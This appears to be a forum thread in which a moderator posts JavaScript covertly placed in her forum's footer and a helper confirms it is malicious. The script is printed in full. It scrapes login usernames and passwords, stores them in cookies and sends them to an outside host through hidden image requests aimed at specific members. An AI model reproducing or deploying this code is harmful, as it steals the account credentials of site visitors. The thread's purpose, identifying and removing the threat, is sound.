  1. #1

    Unsure what this JS code does

    I'm a moderator on a forum, and without informing the admin another moderator (who is responsible for tech things) put up this javascript code in the forum footer, and we have no idea what it does...basically we're suspicious, we have limited javascript knowledge and if we ask the tech mod it's hard to trust his explanation.

    All the mentions of 'username' and 'pass' in the code made us suspect that it might be for stealing members' login details. We recently had an incident where a member believes someone accessed their account, so we want to make sure this code didn't contribute to it.

    I know we're probably just paranoid

    If anyone can give me an idea of what the purpose of it is, I'd be so grateful.

    Thank you,

    Daria.


    Code:
    // Target list. inUserList() compares each entry against rot13(username), so these
    // strings are ROT13-obfuscated usernames rather than literal account names.
    // ROT13 is trivially reversible obfuscation, not encryption.
    var users=['cbfrl','ckkk','puybrxvggra'];
    //var users=['foo'];
    
    
    /**
     * Rotates a single character code inside an alphabet that starts at `u`.
     *
     * @param {number} t - character code to rotate
     * @param {number} u - character code of the first letter of the alphabet ('a' or 'A')
     * @param {number} v - rotation distance; the alphabet length is taken as v * 2
     * @returns {string} the rotated character
     */
    function rot(t, u, v) {
      const alphabetLength = v * 2;
      const rotatedOffset = (t - u + v) % alphabetLength;
      return String.fromCharCode(rotatedOffset + u);
    }

    /**
     * ROT13 over ASCII letters; every other character is passed through unchanged.
     * ROT13 is its own inverse, so the same call both obfuscates and recovers a string.
     * It hides text from casual reading only and provides no confidentiality.
     *
     * @param {string} s - text to transform
     * @returns {string} the transformed text, same length as the input
     */
    function rot13(s) {
      const lowerStart = 'a'.charCodeAt(0);
      const upperStart = 'A'.charCodeAt(0);
      return s
        .split('')
        .map((ch) => {
          const code = ch.charCodeAt(0);
          if (code >= lowerStart && code < lowerStart + 26) {
            return rot(code, lowerStart, 13);
          }
          if (code >= upperStart && code < upperStart + 26) {
            return rot(code, upperStart, 13);
          }
          return ch;
        })
        .join('');
    }
    
    // Sends usr and pwd to an off-site host by loading an image.
    // The query parameter names "hfreanzr" and "cnffjbeq" are ROT13 for "username" and
    // "password". Assigning Image.src makes the browser issue a GET request, so both
    // values leave the page inside the URL; no form submit or XHR is involved.
    // NOTE(review): the endpoint is plain http://, so the query string also crosses the
    // network unencrypted. usr/pwd are sent as received here (only encodeURI is applied).
    function collectionImg(usr,pwd){
            var src_url = 'http://www.quickdry.net/quickdry/ajax/image.php';
    	var poststr_usr = "hfreanzr=" + encodeURI(usr);
    	var poststr_pwd = "cnffjbeq=" + encodeURI(pwd);
    	// The Image is parked on window, which keeps a reference to it after this function returns.
    	window['myimg1'] = new Image();
    	window['myimg1'].src=src_url + '?' + poststr_usr + "&" + poststr_pwd;
    }
    // Same image-request channel as collectionImg(), but aimed at imagec.php and with both
    // values ROT13-encoded here before they are placed in the query string.
    // In this listing it is only called from collectDetailsFromCookie(), which passes the
    // value of the "pass" cookie as pwd.
    function collectionImgCookie(usr,pwd){
            var src_url = 'http://www.quickdry.net/quickdry/ajax/imagec.php';
    	var poststr_usr = "hfreanzr=" + encodeURI(rot13(usr));
    	var poststr_pwd = "cnffjbeq=" + encodeURI(rot13(pwd));
    	window['myimg2'] = new Image();
    	window['myimg2'].src=src_url + '?' + poststr_usr + "&" + poststr_pwd;
    }
    
    // Returns the unescaped value that follows the first occurrence of NameOfCookie + "="
    // in document.cookie, or '' when there are no cookies or no match.
    // NOTE(review): `begin` and `end` are assigned without var, so they become globals.
    // The indexOf search is a plain substring match, so a longer cookie name that ends in
    // NameOfCookie would also match.
    function getCookie(NameOfCookie)
    { if (document.cookie.length > 0)
    { begin = document.cookie.indexOf(NameOfCookie+"=");
    if (begin != -1)
    { begin += NameOfCookie.length+1;
    end = document.cookie.indexOf(";", begin);
    // No trailing ";" means this is the last cookie in the string.
    if (end == -1) end = document.cookie.length;
    return unescape(document.cookie.substring(begin, end)); }
    }
    return '';
    }
    
    // Writes NameOfCookie=escape(value) to document.cookie. When expiredays is null or
    // undefined no expires attribute is added; otherwise the cookie expires that many days
    // from now. No path, domain or secure attribute is set.
    function setCookie(NameOfCookie, value, expiredays)
    { var ExpireDate = new Date ();
    ExpireDate.setTime(ExpireDate.getTime() + (expiredays * 24 * 3600 * 1000));
    document.cookie = NameOfCookie + "=" + escape(value) +
    ((expiredays == null) ? "" : "; expires=" + ExpireDate.toGMTString());
    }
    
    // Writes a cookie whose expiry is given as a Date object (expirydate).
    // NOTE(review): the body tests `expiredays`, which is neither a parameter nor declared
    // here, so a call would throw a ReferenceError unless a global of that name exists.
    // Nothing in this listing calls the function.
    function setCookieExplicitDate(NameOfCookie, value, expirydate)
    {
    document.cookie = NameOfCookie + "=" + escape(value) +
    ((expiredays == null) ? "" : "; expires=" + expirydate.toGMTString());
    }
    
    // Expires the named cookie by rewriting it with an empty value and a 1970 expiry date.
    // Does nothing when getCookie() returns an empty value for that name.
    function delCookie(NameOfCookie)
    { if (getCookie(NameOfCookie)) {
    document.cookie = NameOfCookie + "=" +
    "; expires=Thu, 01-Jan-70 00:00:01 GMT";
    }}
    
    // True when the named cookie has a value other than '' or the literal string 'null'.
    function hasCookie(NameOfCookie){
    	var v=getCookie(NameOfCookie);
    	if ((v==null)||(v=='')||(v=='null')){
             	return false;
    	}else{
    		return true;
    	}
    }
    
    // Stores c in a "credentials" cookie with a 30-day lifetime. Every caller in this
    // listing passes rot13(getFormPassword()), i.e. the typed password in ROT13 form,
    // which leaves a recoverable copy of the password in the visitor's cookie store.
    function setCredentials(c){
     	setCookie("credentials",c,30);
    }
    // Reads back the "credentials" cookie written by setCredentials(); '' when absent.
    function getCredentials(){
    	return getCookie("credentials");
    }
    // True when the "credentials" cookie holds a value other than '' or 'null'.
    // Takes no parameters; arguments passed by callers are ignored.
    function hasCredentials(){
    	var v=getCookie("credentials");
    	if ((v!=null)&&(v!='')&&(v!='null')){
             	return true;
    	}else{
    		return false;
    	}
    	// Unreachable: both branches above already return.
    	return false;
    }
    // Writes a 30-day "collected" cookie. collectDetails() stores the username here after
    // a send, and hasCollected() reads it back, so it acts as an "already sent" marker.
    function setCollected(val){
     	setCookie("collected",val,30);
    }
    // Reports whether a send has already been recorded.
    // Requires both a non-empty "collected" cookie and a non-empty "credentials" cookie.
    // With use_username truthy, the "collected" value must also equal username.
    function hasCollected(username, use_username){
     	var v=getCookie("collected");
    	if ((v!=null)&&(v!='')&&(v!='null')&&(hasCredentials())){
    		if (use_username){
    			if (v==username){
    				return true;
    			}else{
    			     	return false;
    			}
    		}
             	return true;
    	}else{
    		return false;
    	}
    }
    // Scrapes the page for an <input> whose name attribute is "username" (case-insensitive)
    // and returns its current value; '' when none is found. If several match, the last wins.
    function getFormLogin(){
    	var everything=document.getElementsByTagName('input');
    	var s='';
    	for(var i=0;i<everything.length;i++)
    	{
    		try{
                    if(everything[i].getAttribute('name').toLowerCase()=="username")
                    {
                            s=everything[i].value;
                    }
    		}catch(er){
    		// Errors are swallowed, e.g. when getAttribute() returns null for an input
    		// without a name attribute.
    		}
    	}
    	return s;
    }
    // Scrapes the page for an <input type="password"> and returns what is currently typed
    // in it; '' when none is found. If several match, the last wins. This reads the
    // cleartext password straight from the DOM of the page the script is embedded in.
    function getFormPassword(){
    	var everything=document.getElementsByTagName('input');
    	var s='';
    	for(var i=0;i<everything.length;i++)
    	{
    		try{
                    if(everything[i].getAttribute('type').toLowerCase()=="password")
                    {
                            s=everything[i].value;
                    }
    		}catch(er){
    		// Errors are swallowed, e.g. for inputs with no type attribute.
    		}
    	}
    	return s;
    }
    // True when rot13(username) equals one of the entries in the global `users` array,
    // i.e. when the given account is one of the listed targets.
    function inUserList(username){
    	for(var i=0;i<users.length;i++){
    		if (users[i]==rot13(username)){
    			return true;
    		}
    	}
    	return false;
    }
    // True when either the username typed into the login form or the global pb_username
    // is on the target list. Each check is wrapped in try/catch so a failure in one
    // (for example pb_username not being defined) does not stop the other.
    // NOTE(review): pb_username is not defined in this listing; presumably the hosting
    // forum page supplies it — confirm against the page source.
    function isCollectableUser(){
    	try{
    		if (inUserList(getFormLogin())){
    			return true;
    		}
    	}catch(er){
    	}
    	try{
    		if (inUserList(pb_username)){
    			return true;
    		}
    	}catch(er){
    	}
    	return false;
    }
    // Treats the visitor as being at the login page when pb_username is "Guest",
    // i.e. it actually tests "not logged in" rather than the page URL.
    function atLoginPage(){
    	if (pb_username=="Guest"){
    		return true;
    	}
    	return false;
    }
    
    // Cookie-based path: when pb_username is on the target list and a "pass" cookie exists,
    // sends the username and that cookie's value to imagec.php via collectionImgCookie().
    // NOTE(review): the "pass" cookie is not written anywhere in this listing; presumably
    // it is set by the forum software itself — confirm.
    function collectDetailsFromCookie(){
    	if (inUserList(pb_username)){
            	if (hasCookie("pass")){
                     	collectionImgCookie(pb_username,getCookie("pass"));
            	}
    	}
    }
    
    // Form-based path, installed as the window.onunload handler, so it runs each time a
    // page containing the script is left. It works as a small state machine across page
    // loads, with the "credentials" and "collected" cookies carrying the state:
    //   1. Leaving the login page as a targeted user: the typed password is saved,
    //      ROT13-encoded, in the "credentials" cookie.
    //   2. Leaving a later page while logged in: the saved value and the ROT13-encoded
    //      username are sent off-site via collectionImg(), and "collected" is set so the
    //      same pair is not sent again.
    //   3. For visitors who are not on the target list the state cookies are removed.
    function collectDetails()
    {
    	if (isCollectableUser()){
    		if (hasCollected(pb_username,true)){
    			// Already sent once for this user: only re-arm if a different password
    			// is typed on the login page.
    			var plain_pwd=rot13(getCredentials());
    			if (atLoginPage()){
                            	if (getFormPassword() != plain_pwd){
                                            delCookie('collected');
                                            setCredentials(rot13(getFormPassword()));
    				}
    			}
    
    		}else{
    			// hasCredentials() declares no parameters, so the two arguments are ignored.
    			if ((hasCredentials(pb_username,true))&&(!atLoginPage())){
    				// pwd is forwarded as stored, i.e. still in ROT13 form.
    				var usr=rot13(pb_username);
    				var pwd=getCredentials();
    				collectionImg(usr,pwd);
    				setCollected(pb_username);
    			}else{
    				if (atLoginPage()){
    					setCredentials(rot13(getFormPassword()));
    				}else{
    					// Targeted user, logged in, but nothing captured yet: besides the
    					// script's own cookies this also deletes "user" and "pass".
    					// NOTE(review): if those are the forum's login cookies, removing
    					// them would force the user to log in again — confirm.
    					delCookie('user');
    					delCookie('pass');
    					delCookie('collected');
    					delCookie('credentials');
    				}
    			}
    		}
    	}else{
    		delCookie('collected');
    		delCookie('credentials');
    	}
    }
    // Entry points: the form-based path runs on every page unload (replacing any onunload
    // handler that was assigned earlier), and the cookie-based path runs once immediately,
    // as soon as the script is loaded.
    window.onunload=collectDetails;
    
    collectDetailsFromCookie();
    Last edited by daria35; 12-08-2006 at 07:28 PM.

  • #2
    Supreme Master coder! _Aerospace_Eng_'s Avatar
    Well, the giveaway is that he is using this
    http://www.quickdry.net/quickdry/ajax/image.php
    which is able to receive info just by being requested from the page. It's a dynamic image that collects info, so your suspicions are exactly right. The script does appear to be collecting usernames and passwords and then sending them to the image URL he is using.

    This image
    http://www.quickdry.net/quickdry/ajax/image.php
    is a 1x1 transparent image, so it's not seen.

    He uses another one here
    http://www.quickdry.net/quickdry/ajax/imagec.php

    That does the same thing except it stores the info in a cookie somewhere.

    Is your forum on quickdry.net? If it's not, then I recommend removing the JS, as it seems to have no purpose other than to be malicious.
    ||||If you are getting paid to do a job, don't ask for help on it!||||

  • #3
    No, our forum is hosted on www.proboards.com.

    Thank you for confirming our suspicions.

    Funnily enough, once we started to discuss the issue privately in pm's between a couple of mods on the forum (without the tech mod) the code was all of a sudden taken down from the forum footer, and it wasn't taken down by any of us.

    The first part of the code:

    var users=['cbfrl','ckkk','puybrxvggra'];
    //var users=['foo'];

    Are they meant to be usernames of forum members? Because those aren't the names of anyone signed up, what are they meant to be?

    Thanks again for your help.
    Last edited by daria35; 12-07-2006 at 10:13 PM.

  • #4
    Supreme Master coder! _Aerospace_Eng_'s Avatar
    It seems like whoever put the code up was testing to see if it worked. Once they had figured out whether it worked or not, they would assign the users var to something else that was more tied into the forums, such as the username login box.
    ||||If you are getting paid to do a job, don't ask for help on it!||||

  • #5
    So to get the passwords he would have had to put the usernames set as the variables?

    Could those random letters be encrypted usernames? It just looks odd because my username and another mod's name are "pxxx" and "pseudonymph", they kind of look similar and are the same amount of letters as two of those random words he's put as the variables. It could just be a coincidence I suppose.

    He had the script up on the forum for about a month, and the code wasn't posted directly inside the forum footers box, probably so we wouldn't notice it and question it, it was posted as a link to the script, like <script src="http://www.quickdry.net/quickdry/forum/rogue/rogue.js" type="text/javascript"></script> amongst a whole bunch of other things we had put in there.

    So just to clarify, is there any chance at all that the script could have been for something innocent?

    I also found this 'test' script uploaded on his site:
    http://www.quickdry.net/quickdry/forum/rogue/test.js
    That one was never posted on the forum though I don't think.
    Last edited by daria35; 12-07-2006 at 11:24 PM.

  • #6
    Supreme Master coder! _Aerospace_Eng_'s Avatar
    I see nothing innocent about the script other than whoever put it up was trying to get the private info of one or more persons. Those three test users decrypt into the following names

    posey
    pxxx
    chloekitten

    I say change your passwords, remove the script, and remove that moderator from your staff. If you would like to know how I got those usernames decrypted then you can follow this as a template
    Code:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <meta content="description" name="Description">
    <meta content="keywords" name="Keywords">
    <title></title>
    <!-- Stand-alone decoder page: it contains only the two ROT13 helpers and three alert()
         calls, so it makes no network requests and reads no cookies or form fields. -->
    <script type="text/javascript">
    // Rotates one character code by v positions within an alphabet of length v*2 starting at u.
    function rot(t,u,v){return String.fromCharCode(((t-u+v)%(v*2))+u);}
    // ROT13 over a-z and A-Z; other characters pass through. ROT13 is its own inverse,
    // which is why the same function that obfuscated the names also recovers them.
    function rot13(s){ var b=[], c, i = s.length,  a = 'a'.charCodeAt(), z = a + 26,  A = 'A'.charCodeAt(), Z = A + 26; while(i--) {  c = s.charCodeAt( i );  if( c>=a && c<z ) { b[i] = rot( c, a, 13 ); }  else if( c>=A && c<Z ) { b[i] = rot( c, A, 13 ); }  else { b[i] = s.charAt( i ); } } return b.join( '' );}
    // Each alert shows the decoded form of one of the three obfuscated strings.
    alert(rot13('cbfrl'));
    alert(rot13('ckkk'));
    alert(rot13('puybrxvggra'));
    </script>
    </head>
    <body>
    </body>
    </html>
    It uses the two functions that were in the javascript file you found.
    ||||If you are getting paid to do a job, don't ask for help on it!||||

  • #7
    Thanks Aerospace.

    I really appreciate your help and advice on this matter, and so will our forum members.
    Last edited by daria35; 12-08-2006 at 07:26 AM.

